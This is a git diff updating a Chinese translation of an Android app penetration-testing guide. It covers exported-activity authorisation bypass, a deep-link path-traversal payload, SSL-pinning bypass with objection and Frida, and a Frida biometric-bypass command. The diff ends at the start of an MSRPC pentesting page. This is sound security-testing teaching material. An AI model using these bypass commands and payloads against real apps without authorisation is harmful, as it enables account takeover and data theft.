**内容提供者和文件提供者**:暴露的内容提供者可能允许未经授权访问或修改数据。文件提供者的配置也应受到审查。 -* **广播接收器和 URL 方案**:这些组件可能被利用进行攻击,特别注意 URL 方案如何管理输入漏洞。 +* **广播接收器和 URL 方案**:这些组件可能被利用进行攻击,特别注意如何管理 URL 方案以防止输入漏洞。 * **SDK 版本**:`minSdkVersion`、`targetSDKVersion` 和 `maxSdkVersion` 属性指示支持的 Android 版本,强调出于安全原因不支持过时、易受攻击的 Android 版本的重要性。 从 **strings.xml** 文件中,可以发现敏感信息,如 API 密钥、自定义模式和其他开发者注释,强调了对这些资源进行仔细审查的必要性。 @@ -105,7 +105,7 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed ### Tapjacking **Tapjacking** 是一种攻击,其中**恶意** **应用程序**被启动并**定位在受害者应用程序的顶部**。一旦它可见地遮挡了受害者应用程序,其用户界面被设计成欺骗用户与之交互,同时将交互传递给受害者应用程序。\ -实际上,它是**让用户不知道他们实际上是在对受害者应用程序执行操作**。 +实际上,它是**让用户无法知道他们实际上是在对受害者应用程序执行操作**。 在这里找到更多信息: @@ -115,7 +115,7 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed ### 任务劫持 -一个**活动**,其**`launchMode`** 设置为**`singleTask`**,且未定义任何 `taskAffinity`,易受任务劫持。这意味着,可以安装一个**应用程序**,如果在真实应用程序之前启动,它可能会**劫持真实应用程序的任务**(因此用户将与**恶意应用程序**交互,以为自己在使用真实应用程序)。 +一个**活动**如果**`launchMode`** 设置为 **`singleTask`** 且没有定义任何 `taskAffinity`,则容易受到任务劫持。这意味着,一个**应用程序**可以被安装,如果在真实应用程序之前启动,它可能会**劫持真实应用程序的任务**(因此用户将与**恶意应用程序**交互,以为自己在使用真实应用程序)。 更多信息在: @@ -127,7 +127,7 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed **内部存储** -在 Android 中,**存储**在**内部**存储中的文件**设计**为仅由**创建**它们的**应用程序**访问。此安全措施由 Android 操作系统**强制**执行,通常足以满足大多数应用程序的安全需求。然而,开发者有时会利用 `MODE_WORLD_READABLE` 和 `MODE_WORLD_WRITABLE` 等模式来**允许**文件在不同应用程序之间**共享**。然而,这些模式**并不限制**其他应用程序(包括潜在恶意应用程序)对这些文件的访问。 +在 Android 中,**存储**在**内部**存储中的文件**设计**为仅由**创建**它们的**应用程序**访问。此安全措施由 Android 操作系统**强制**执行,通常足以满足大多数应用程序的安全需求。然而,开发人员有时会使用 `MODE_WORLD_READABLE` 和 `MODE_WORLD_WRITABLE` 等模式来**允许**文件在不同应用程序之间**共享**。然而,这些模式**并不限制**其他应用程序(包括潜在的恶意应用程序)对这些文件的访问。 1. **静态分析:** * **确保**仔细审查 `MODE_WORLD_READABLE` 和 `MODE_WORLD_WRITABLE` 的使用。这些模式**可能会暴露**文件给**意外或未经授权的访问**。 @@ -146,7 +146,7 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed 3. **处理来自外部存储的数据**: * 始终对从外部存储检索的数据**执行输入验证**。这至关重要,因为数据来自不受信任的来源。 * 强烈不建议在外部存储上存储可执行文件或类文件以进行动态加载。 -* 如果您的应用程序必须从外部存储检索可执行文件,请确保这些文件在动态加载之前**已签名并经过加密验证**。此步骤对于维护应用程序的安全完整性至关重要。 +* 如果您的应用程序必须从外部存储检索可执行文件,请确保这些文件在动态加载之前**经过签名和加密验证**。此步骤对于维护应用程序的安全完整性至关重要。 外部存储可以在 `/storage/emulated/0`、`/sdcard`、`/mnt/sdcard` 中访问。 @@ -163,7 +163,7 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed **接受所有证书** -出于某种原因,有时开发者会接受所有证书,即使例如主机名与以下代码行不匹配: +出于某种原因,有时开发人员会接受所有证书,即使例如主机名与以下代码行不匹配: ```java SSLSocketFactory sf = new cc(trustStore); sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER); @@ -174,7 +174,7 @@ A good way to test this is to try to capture the traffic using some proxy like B **Poor Key Management Processes** -一些开发者将敏感数据保存在本地存储中,并用代码中硬编码/可预测的密钥进行加密。这是不应该的,因为一些反向工程可能允许攻击者提取机密信息。 +一些开发者将敏感数据保存在本地存储中,并使用在代码中硬编码/可预测的密钥进行加密。这是不应该的,因为一些反向工程可能允许攻击者提取机密信息。 **Use of Insecure and/or Deprecated Algorithms** @@ -239,7 +239,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains *** -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -258,7 +258,7 @@ Stay informed with the newest bug bounties launching and crucial platform update ## Dynamic Analysis -> First of all, you need an environment where you can install the application and all the environment (Burp CA cert, Drozer and Frida mainly). Therefore, a rooted device (emulated or not) is extremely recommended. +> 首先,您需要一个可以安装应用程序和所有环境(主要是Burp CA证书、Drozer和Frida)的环境。因此,强烈建议使用已root的设备(无论是模拟的还是非模拟的)。 ### Online Dynamic analysis @@ -281,52 +281,52 @@ Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emu [avd-android-virtual-device.md](avd-android-virtual-device.md) {% endcontent-ref %} -* [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Free version:** Personal Edition, you need to create an account. _It's recommend to **download** the version **WITH**_ _**VirtualBox** to avoid potential errors._) -* [**Nox**](https://es.bignox.com) (Free, but it doesn't support Frida or Drozer). +* [**Genymotion**](https://www.genymotion.com/fun-zone/) **(免费版本:**个人版,您需要创建一个帐户。_建议下载**带有**_**VirtualBox**的版本以避免潜在错误。_) +* [**Nox**](https://es.bignox.com) (免费,但不支持Frida或Drozer)。 {% hint style="info" %} -When creating a new emulator on any platform remember that the bigger the screen is, the slower the emulator will run. So select small screens if possible. +创建新模拟器时,请记住屏幕越大,模拟器运行越慢。因此,如果可能,请选择小屏幕。 {% endhint %} -To **install google services** (like AppStore) in Genymotion you need to click on the red marked button of the following image: +要在Genymotion中**安装谷歌服务**(如AppStore),您需要单击以下图像中红色标记的按钮: ![](<../../.gitbook/assets/image (277).png>) -Also, notice that in the **configuration of the Android VM in Genymotion** you can select **Bridge Network mode** (this will be useful if you will be connecting to the Android VM from a different VM with the tools). +此外,请注意在Genymotion的**Android VM配置中**,您可以选择**桥接网络模式**(如果您将从不同的VM连接到Android VM并使用工具,这将非常有用)。 #### Use a physical device -You need to activate the **debugging** options and it will be cool if you can **root** it: +您需要激活**调试**选项,如果您能**root**它,那就更好了: -1. **Settings**. -2. (FromAndroid 8.0) Select **System**. -3. Select **About phone**. -4. Press **Build number** 7 times. -5. Go back and you will find the **Developer options**. +1. **设置**。 +2. (从Android 8.0开始)选择**系统**。 +3. 选择**关于手机**。 +4. 按**构建号**7次。 +5. 返回,您将找到**开发者选项**。 -> Once you have installed the application, the first thing you should do is to try it and investigate what does it do, how does it work and get comfortable with it.\ -> I will suggest to **perform this initial dynamic analysis using MobSF dynamic analysis + pidcat**, so we will be able to **learn how the application works** while MobSF **captures** a lot of **interesting** **data** you can review later on. +> 一旦您安装了应用程序,您应该做的第一件事是尝试它并调查它的功能、工作原理,并熟悉它。\ +> 我建议使用MobSF动态分析+pidcat执行此初步动态分析,这样我们就可以在MobSF**捕获**大量**有趣的**数据时**了解应用程序的工作原理**,您可以稍后查看。 ### Unintended Data Leakage **Logging** -开发者应该谨慎公开**调试信息**,因为这可能导致敏感数据泄露。推荐使用工具[**pidcat**](https://github.com/JakeWharton/pidcat)和`adb logcat`来监控应用程序日志,以识别和保护敏感信息。**Pidcat**因其易用性和可读性而受到青睐。 +开发者应谨慎公开**调试信息**,因为这可能导致敏感数据泄露。推荐使用工具[**pidcat**](https://github.com/JakeWharton/pidcat)和`adb logcat`来监控应用程序日志,以识别和保护敏感信息。**Pidcat**因其易用性和可读性而受到青睐。 {% hint style="warning" %} -注意,从**Android 4.0 及更高版本**开始,**应用程序只能访问自己的日志**。因此,应用程序无法访问其他应用的日志。\ +请注意,从**Android 4.0及更高版本**开始,**应用程序只能访问自己的日志**。因此,应用程序无法访问其他应用的日志。\ 无论如何,仍然建议**不要记录敏感信息**。 {% endhint %} **Copy/Paste Buffer Caching** -Android的**基于剪贴板**的框架使应用程序能够实现复制粘贴功能,但也带来了风险,因为**其他应用程序**可以**访问**剪贴板,可能会暴露敏感数据。对于应用程序的敏感部分,如信用卡信息,至关重要的是**禁用复制/粘贴**功能,以防止数据泄露。 +Android的**基于剪贴板**的框架使应用程序能够实现复制粘贴功能,但也带来了风险,因为**其他应用程序**可以**访问**剪贴板,可能会暴露敏感数据。对于应用程序的敏感部分(如信用卡详细信息),至关重要的是**禁用复制/粘贴**功能,以防止数据泄露。 **Crash Logs** -如果应用程序**崩溃**并**保存日志**,这些日志可能会帮助攻击者,特别是当应用程序无法被反向工程时。为了降低这种风险,避免在崩溃时记录日志,如果必须通过网络传输日志,确保通过SSL通道发送以确保安全。 +如果应用程序**崩溃**并**保存日志**,这些日志可能会帮助攻击者,特别是当应用程序无法被反向工程时。为了降低这种风险,避免在崩溃时记录日志,如果必须通过网络传输日志,请确保通过SSL通道发送以确保安全。 -作为渗透测试者,**尝试查看这些日志**。 +作为渗透测试者,**请查看这些日志**。 **Analytics Data Sent To 3rd Parties** @@ -334,33 +334,33 @@ Android的**基于剪贴板**的框架使应用程序能够实现复制粘贴功 ### SQLite DBs -大多数应用程序将使用**内部SQLite数据库**来保存信息。在渗透测试期间,查看创建的**数据库**、**表**和**列**的名称以及所有保存的**数据**,因为你可能会发现**敏感信息**(这将是一个漏洞)。\ -数据库应位于`/data/data/the.package.name/databases`,如`/data/data/com.mwr.example.sieve/databases` +大多数应用程序将使用**内部SQLite数据库**来保存信息。在渗透测试期间,请**查看**创建的**数据库**、**表**和**列**的名称以及所有保存的数据,因为您可能会发现**敏感信息**(这将是一个漏洞)。\ +数据库应位于`/data/data/the.package.name/databases`,例如`/data/data/com.mwr.example.sieve/databases` -如果数据库保存机密信息并且是**加密的**但你可以在应用程序中**找到**密码,这仍然是一个**漏洞**。 +如果数据库保存机密信息并且是**加密的**但您可以在应用程序中**找到**密码,这仍然是一个**漏洞**。 -使用`.tables`列出表,使用`.schema `列出表的列 +使用`.tables`枚举表,使用`.schema `枚举表的列。 ### Drozer (Exploit Activities, Content Providers and Services) -From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** allows you to **assume the role of an Android app** and interact with other apps. It can do **anything that an installed application can do**, such as make use of Android’s Inter-Process Communication (IPC) mechanism and interact with the underlying operating system. .\ -Drozer是一个有用的工具,可以**利用导出活动、导出服务和内容提供者**,正如你将在以下部分中学习的那样。 +来自[Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf):**Drozer**允许您**假装成一个Android应用程序**并与其他应用程序交互。它可以做**任何已安装应用程序可以做的事情**,例如利用Android的进程间通信(IPC)机制并与底层操作系统交互。\ +Drozer是一个有用的工具,可以**利用导出活动、导出服务和内容提供者**,您将在以下部分中学习。 ### Exploiting exported Activities -[**Read this if you want to refresh what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\ -也请记住,活动的代码从**`onCreate`**方法开始。 +[**如果您想刷新一下什么是Android活动,请阅读此内容。**](android-applications-basics.md#launcher-activity-and-other-activities)\ +还要记住,活动的代码从**`onCreate`**方法开始。 **Authorisation bypass** -当一个活动被导出时,你可以从外部应用调用它的界面。因此,如果一个包含**敏感信息**的活动被**导出**,你可能会**绕过**访问它的**认证**机制。 +当一个活动被导出时,您可以从外部应用程序调用其屏幕。因此,如果一个包含**敏感信息**的活动被**导出**,您可以**绕过****身份验证**机制**以访问它**。 -[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/#activities) +[**了解如何利用导出活动与Drozer。**](drozer-tutorial/#activities) -你也可以从adb启动一个导出的活动: +您还可以从adb启动导出活动: -* PackageName是com.example.demo -* Exported ActivityName是com.example.test.MainActivity +* 包名是com.example.demo +* 导出活动名称是com.example.test.MainActivity ```bash adb shell am start -n com.example.demo/com.example.test.MainActivity ``` @@ -376,26 +376,26 @@ adb shell am start -n com.example.demo/com.example.test.MainActivity #### Tapjacking -如果没有防止tapjacking,你可以利用导出的活动使**用户执行意外操作**。有关[**什么是Tapjacking的更多信息,请访问此链接**](./#tapjacking)。 +如果没有防止tapjacking,你可能会滥用导出的活动使**用户执行意外操作**。有关[**什么是Tapjacking的更多信息,请查看链接**](./#tapjacking)。 ### 利用内容提供者 - 访问和操纵敏感信息 -[**如果你想刷新什么是内容提供者,请阅读此内容。**](android-applications-basics.md#content-provider)\ +[**如果你想刷新什么是内容提供者,请阅读这个。**](android-applications-basics.md#content-provider)\ 内容提供者基本上用于**共享数据**。如果一个应用程序有可用的内容提供者,你可能能够**提取敏感**数据。测试可能的**SQL注入**和**路径遍历**也很有趣,因为它们可能存在漏洞。 [**学习如何使用Drozer利用内容提供者。**](drozer-tutorial/#content-providers) ### **利用服务** -[**如果你想刷新什么是服务,请阅读此内容。**](android-applications-basics.md#services)\ +[**如果你想刷新什么是服务,请阅读这个。**](android-applications-basics.md#services)\ 请记住,服务的操作始于方法`onStartCommand`。 -服务基本上是可以**接收数据**、**处理**它并**返回**(或不返回)响应的东西。因此,如果一个应用程序导出了一些服务,你应该**检查**代码以了解它在做什么,并**动态测试**以提取机密信息、绕过身份验证措施...\ +服务基本上是可以**接收数据**、**处理**它并**返回**(或不返回)响应的东西。因此,如果一个应用程序导出了一些服务,你应该**检查**其**代码**以了解它在做什么,并**动态测试**以提取机密信息、绕过身份验证措施...\ [**学习如何使用Drozer利用服务。**](drozer-tutorial/#services) ### **利用广播接收器** -[**如果你想刷新什么是广播接收器,请阅读此内容。**](android-applications-basics.md#broadcast-receivers)\ +[**如果你想刷新什么是广播接收器,请阅读这个。**](android-applications-basics.md#broadcast-receivers)\ 请记住,广播接收器的操作始于方法`onReceive`。 广播接收器将等待某种类型的消息。根据接收器如何处理消息,它可能会存在漏洞。\ @@ -403,7 +403,7 @@ adb shell am start -n com.example.demo/com.example.test.MainActivity ### **利用方案/深度链接** -你可以手动查找深度链接,使用像MobSF这样的工具或像[这个](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py)的脚本。\ +你可以手动查找深度链接,使用像MobSF这样的工具或像[这个脚本](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py)。\ 你可以使用**adb**或**浏览器**打开声明的**方案**: {% code overflow="wrap" %} @@ -436,11 +436,11 @@ _请注意,您可以**省略包名**,手机将自动调用应该打开该链 **路径中的参数** 您**还必须检查任何深度链接是否在 URL 的路径中使用参数**,例如:`https://api.example.com/v1/users/{username}`,在这种情况下,您可以强制路径遍历,访问类似于:`example://app/users?username=../../unwanted-endpoint%3fparam=value`。\ -请注意,如果您在应用程序中找到正确的端点,您可能能够导致**开放重定向**(如果路径的一部分用作域名),**账户接管**(如果您可以在没有 CSRF 令牌的情况下修改用户详细信息,并且漏洞端点使用了正确的方法)以及任何其他漏洞。更多[信息在这里](http://dphoeniixx.com/2020/12/13-2/)。 +请注意,如果您在应用程序中找到正确的端点,您可能能够导致**开放重定向**(如果路径的一部分用作域名)、**账户接管**(如果您可以在没有 CSRF 令牌的情况下修改用户详细信息,并且漏洞端点使用了正确的方法)以及任何其他漏洞。更多[信息在这里](http://dphoeniixx.com/2020/12/13-2/)。 **更多示例** -一个[有趣的漏洞赏金报告](https://hackerone.com/reports/855618)关于链接 (_/.well-known/assetlinks.json_)。 +一个[有趣的漏洞赏金报告](https://hackerone.com/reports/855618)关于链接(_/.well-known/assetlinks.json_)。 ### 传输层检查和验证失败 @@ -458,15 +458,15 @@ SSL 钉扎是一种安全措施,应用程序将服务器的证书与存储在 #### 流量检查 -要检查 HTTP 流量,必须**安装代理工具的证书**(例如,Burp)。如果不安装此证书,经过代理的加密流量可能不可见。有关安装自定义 CA 证书的指南,[**请点击这里**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine)。 +要检查 HTTP 流量,必须**安装代理工具的证书**(例如,Burp)。如果不安装此证书,加密流量可能无法通过代理可见。有关安装自定义 CA 证书的指南,[**请点击这里**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine)。 针对**API Level 24 及以上**的应用程序需要修改网络安全配置以接受代理的 CA 证书。这一步对于检查加密流量至关重要。有关修改网络安全配置的说明,[**请参考此教程**](make-apk-accept-ca-certificate.md)。 #### 绕过 SSL 钉扎 -当实施 SSL 钉扎时,绕过它变得必要,以检查 HTTPS 流量。为此有多种方法可用: +当实施 SSL 钉扎时,绕过它成为检查 HTTPS 流量的必要步骤。为此有多种方法可用: -* 自动**修改** **apk**以**绕过** SSLPinning,使用[**apk-mitm**](https://github.com/shroudedcode/apk-mitm)。此选项的最大优点是,您无需 root 即可绕过 SSL 钉扎,但您需要删除应用程序并重新安装新版本,这并不总是有效。 +* 自动**修改** **apk**以**绕过** SSL 钉扎,使用[**apk-mitm**](https://github.com/shroudedcode/apk-mitm)。此选项的最大优点是,您无需 root 即可绕过 SSL 钉扎,但您需要删除应用程序并重新安装新版本,这并不总是有效。 * 您可以使用**Frida**(下面讨论)来绕过此保护。这里有一个使用 Burp+Frida+Genymotion 的指南:[https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/) * 您还可以尝试使用[**objection**](frida-tutorial/objection-tutorial.md)**自动绕过 SSL 钉扎**:`objection --gadget com.package.app explore --startup-command "android sslpinning disable"` * 您还可以尝试使用**MobSF 动态分析**(下面解释)**自动绕过 SSL 钉扎** @@ -478,7 +478,7 @@ SSL 钉扎是一种安全措施,应用程序将服务器的证书与存储在 ### Frida -[Frida](https://www.frida.re) 是一个动态插桩工具包,供开发人员、逆向工程师和安全研究人员使用。\ +[Frida](https://www.frida.re)是一个动态插桩工具包,供开发人员、逆向工程师和安全研究人员使用。\ **您可以访问正在运行的应用程序并在运行时挂钩方法以更改行为、更改值、提取值、运行不同的代码...**\ 如果您想对 Android 应用程序进行渗透测试,您需要知道如何使用 Frida。 @@ -521,7 +521,7 @@ frida -U -f com.example.app -l frida-scripts/tracer-cipher.js ``` ### **指纹/生物识别绕过** -使用以下 Frida 脚本,可以**绕过指纹认证**,Android 应用可能会执行此操作以**保护某些敏感区域:** +使用以下 Frida 脚本,可能可以 **绕过指纹认证**,Android 应用程序可能会执行此操作以 **保护某些敏感区域:** {% code overflow="wrap" %} ```bash @@ -531,51 +531,51 @@ frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! **黑客见解**\ -参与深入探讨黑客的刺激与挑战的内容 +参与深入探讨黑客的刺激和挑战的内容 **实时黑客新闻**\ 通过实时新闻和见解,跟上快速变化的黑客世界 @@ -593,7 +593,7 @@ getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE); ![](<../../.gitbook/assets/image (866).png>) -**使用漂亮的基于 Web 的前端进行应用程序的漏洞评估**。您还可以执行动态分析(但您需要准备环境)。 +**使用漂亮的基于 Web 的前端进行应用程序的漏洞评估。** 您还可以执行动态分析(但您需要准备环境)。 ```bash docker pull opensecurity/mobile-security-framework-mobsf docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest @@ -619,14 +619,14 @@ MobSF 还允许您进行 **diff/比较** 分析,并集成 **VirusTotal**(您 默认情况下,它还将使用一些 Frida 脚本来 **绕过 SSL 钉扎**、**根检测** 和 **调试器检测**,并 **监控有趣的 API**。\ MobSF 还可以 **调用导出活动**,抓取它们的 **屏幕截图** 并 **保存** 到报告中。 -要 **开始** 动态测试,请按绿色按钮:“**开始仪器化**”。按下“**Frida 实时日志**”以查看 Frida 脚本生成的日志,按下“**实时 API 监视器**”以查看所有调用的挂钩方法、传递的参数和返回值(在按下“开始仪器化”后会出现)。\ +要 **开始** 动态测试,请按绿色按钮:“**开始仪器化**”。按下“**Frida 实时日志**”以查看 Frida 脚本生成的日志,按下“**实时 API 监视器**”以查看所有调用的挂钩方法、传递的参数和返回值(这将在按下“开始仪器化”后出现)。\ MobSF 还允许您加载自己的 **Frida 脚本**(要将您的 Frida 脚本的结果发送到 MobSF,请使用函数 `send()`)。它还具有 **多个预编写的脚本**,您可以加载(您可以在 `MobSF/DynamicAnalyzer/tools/frida_scripts/others/` 中添加更多),只需 **选择它们**,按“**加载**”并按“**开始仪器化**”(您将能够在“**Frida 实时日志**”中看到该脚本的日志)。 ![](<../../.gitbook/assets/image (419).png>) 此外,您还有一些辅助 Frida 功能: -* **枚举已加载的类**:它将打印所有已加载的类 +* **枚举加载的类**:它将打印所有加载的类 * **捕获字符串**:它将打印在使用应用程序时捕获的所有字符串(非常嘈杂) * **捕获字符串比较**:可能非常有用。它将 **显示正在比较的两个字符串** 以及结果是 True 还是 False。 * **枚举类方法**:输入类名(如 "java.io.File"),它将打印该类的所有方法。 @@ -648,10 +648,10 @@ receivers ``` **HTTP工具** -当HTTP流量被捕获时,您可以在“**HTTP(S) Traffic**”底部看到捕获流量的丑陋视图,或者在“**Start HTTPTools**”绿色按钮中看到更好的视图。从第二个选项中,您可以**发送**捕获的**请求**到像Burp或Owasp ZAP这样的**代理**。\ -要做到这一点,_打开Burp -->_ _关闭拦截 --> 在MobSB HTTPTools中选择请求_ --> 按下“**Send to Fuzzer**” --> _选择代理地址_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080))。 +当http流量被捕获时,您可以在“**HTTP(S) Traffic**”底部看到捕获流量的丑陋视图,或者在“**Start HTTPTools**”绿色按钮中看到更好的视图。从第二个选项中,您可以**发送**捕获的**请求**到像Burp或Owasp ZAP这样的**代理**。\ +为此,_打开Burp -->_ _关闭拦截 --> 在MobSB HTTPTools中选择请求_ --> 按下“**Send to Fuzzer**” --> _选择代理地址_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080))。 -完成MobSF的动态分析后,您可以按“**Start Web API Fuzzer**”来**模糊HTTP请求**并寻找漏洞。 +完成MobSF的动态分析后,您可以按“**Start Web API Fuzzer**”来**模糊http请求**并寻找漏洞。 {% hint style="info" %} 在使用MobSF进行动态分析后,代理设置可能会配置错误,您将无法从GUI中修复它们。您可以通过以下方式修复代理设置: @@ -663,17 +663,17 @@ adb shell settings put global http_proxy :0 ### Assisted Dynamic Analysis with Inspeckage 您可以从 [**Inspeckage**](https://github.com/ac-pm/Inspeckage) 获取该工具。\ -该工具将使用一些 **Hooks** 让您了解 **在应用程序中发生了什么**,同时您执行 **动态分析**。 +该工具将使用一些 **Hooks** 让您了解 **在执行动态分析时应用程序中发生了什么**。 ### [Yaazhini](https://www.vegabird.com/yaazhini/) -这是一个 **使用 GUI 进行静态分析的好工具** +这是一个 **用于执行带GUI的静态分析的优秀工具** ![](<../../.gitbook/assets/image (741).png>) ### [Qark](https://github.com/linkedin/qark) -该工具旨在查找多个 **与安全相关的 Android 应用程序漏洞**,无论是在 **源代码** 还是 **打包的 APK** 中。该工具还 **能够创建可部署的 "概念验证" APK** 和 **ADB 命令**,以利用一些发现的漏洞(暴露的活动、意图、tapjacking...)。与 Drozer 一样,无需对测试设备进行 root。 +该工具旨在查找多个 **与安全相关的Android应用程序漏洞**,无论是在 **源代码** 还是 **打包的APK** 中。该工具还 **能够创建可部署的“概念验证”APK** 和 **ADB命令**,以利用一些发现的漏洞(暴露的活动、意图、tapjacking...)。与Drozer一样,无需对测试设备进行root。 ```bash pip3 install --user qark # --user is only needed if not using a virtualenv qark --apk path/to/my.apk @@ -685,7 +685,7 @@ qark --java path/to/specific/java/file.java * 显示所有提取的文件以便于参考 * 自动将APK文件反编译为Java和Smali格式 * 分析AndroidManifest.xml以查找常见漏洞和行为 -* 对常见漏洞和行为进行静态源代码分析 +* 静态源代码分析以查找常见漏洞和行为 * 设备信息 * 以及更多 ```bash @@ -693,7 +693,7 @@ reverse-apk relative/path/to/APP.apk ``` ### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super) -SUPER 是一个可以在 Windows、MacOS X 和 Linux 中使用的命令行应用程序,旨在分析 _.apk_ 文件以寻找漏洞。它通过解压 APK 并应用一系列规则来检测这些漏洞。 +SUPER 是一个可以在 Windows、MacOS X 和 Linux 上使用的命令行应用程序,旨在分析 _.apk_ 文件以寻找漏洞。它通过解压 APK 并应用一系列规则来检测这些漏洞。 所有规则都集中在一个 `rules.json` 文件中,每个公司或测试人员都可以创建自己的规则来分析他们所需的内容。 @@ -735,7 +735,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3 ![](<../../.gitbook/assets/image (595).png>) -**MARA** 是一个 **M**obile **A**pplication **R**everse engineering 和 **A**nalysis Framework。它是一个将常用的移动应用程序逆向工程和分析工具整合在一起的工具,旨在帮助测试移动应用程序以应对 OWASP 移动安全威胁。其目标是使这一任务对移动应用程序开发者和安全专业人员更加简单和友好。 +**MARA** 是一个 **M**obile **A**pplication **R**everse engineering 和 **A**nalysis Framework。它是一个将常用的移动应用程序逆向工程和分析工具整合在一起的工具,旨在帮助测试移动应用程序以应对 OWASP 移动安全威胁。其目标是使这一任务对移动应用程序开发人员和安全专业人员更加简单和友好。 它能够: @@ -762,15 +762,15 @@ ProGuard 作为 Android SDK 的一部分分发,并在以发布模式构建应 ### [DexGuard](https://www.guardsquare.com/dexguard) -在 [https://blog.lexfo.fr/dexguard.html](https://blog.lexfo.fr/dexguard.html) 找到逐步指南以去混淆 apk。 +在 [https://blog.lexfo.fr/dexguard.html](https://blog.lexfo.fr/dexguard.html) 找到去混淆 APK 的逐步指南。 (来自该指南)上次我们检查时,Dexguard 的操作模式是: * 将资源加载为 InputStream; -* 将结果传递给继承自 FilterInputStream 的类以解密; +* 将结果传递给继承自 FilterInputStream 的类以进行解密; * 进行一些无用的混淆,以浪费反向工程师几分钟的时间; -* 将解密的结果传递给 ZipInputStream 以获取 DEX 文件; -* 最后使用 `loadDex` 方法将结果 DEX 加载为资源。 +* 将解密后的结果传递给 ZipInputStream 以获取 DEX 文件; +* 最后使用 `loadDex` 方法将结果 DEX 作为资源加载。 ### [DeGuard](http://apk-deguard.com) @@ -780,7 +780,7 @@ ProGuard 作为 Android SDK 的一部分分发,并在以发布模式构建应 ### [Simplify](https://github.com/CalebFenton/simplify) -它是一个 **通用的 Android 去混淆工具。** Simplify **虚拟执行应用程序** 以理解其行为,然后 **尝试优化代码** 使其表现相同,但更易于人类理解。每种优化类型都简单且通用,因此无论使用何种特定类型的混淆都无关紧要。 +它是一个 **通用的 Android 去混淆器。** Simplify **虚拟执行应用程序** 以理解其行为,然后 **尝试优化代码** 使其表现相同,但更易于人类理解。每种优化类型都简单且通用,因此无论使用何种特定类型的混淆都无关紧要。 ### [APKiD](https://github.com/rednaga/APKiD) @@ -810,7 +810,7 @@ AndroL4b 是一个基于 ubuntu-mate 的 Android 安全虚拟机,包含来自 * [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/) * [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit) -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -821,7 +821,7 @@ AndroL4b 是一个基于 ubuntu-mate 的 Android 安全虚拟机,包含来自 通过实时新闻和见解,跟上快速变化的黑客世界 **最新公告**\ -及时了解最新的漏洞赏金计划和重要平台更新 +及时了解最新的漏洞赏金发布和重要平台更新 **加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作! diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md index 825f2a19c..e0abffdf6 100644 --- a/network-services-pentesting/135-pentesting-msrpc.md +++ b/network-services-pentesting/135-pentesting-msrpc.md @@ -15,7 +15,7 @@ {% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -28,25 +28,25 @@ **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! +**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! ## 基本信息 -Microsoft 远程过程调用 (MSRPC) 协议是一种客户端-服务器模型,使程序能够请求位于另一台计算机上的程序提供服务,而无需了解网络的具体情况。该协议最初源于开源软件,后来由 Microsoft 开发并获得版权。 +Microsoft 远程过程调用 (MSRPC) 协议是一种客户端-服务器模型,使程序能够请求位于另一台计算机上的程序提供服务,而无需了解网络的具体细节。该协议最初源于开源软件,后来由 Microsoft 开发并获得版权。 -RPC 端点映射器可以通过 TCP 和 UDP 端口 135 访问,SMB 在 TCP 139 和 445(使用空会话或经过身份验证的会话)上,以及作为 Web 服务在 TCP 端口 593 上访问。 +RPC 端点映射器可以通过 TCP 和 UDP 端口 135 访问,SMB 在 TCP 139 和 445(使用空会话或经过身份验证的会话)上,以及作为 TCP 端口 593 上的 Web 服务。 ``` 135/tcp open msrpc Microsoft Windows RPC ``` ## MSRPC是如何工作的? 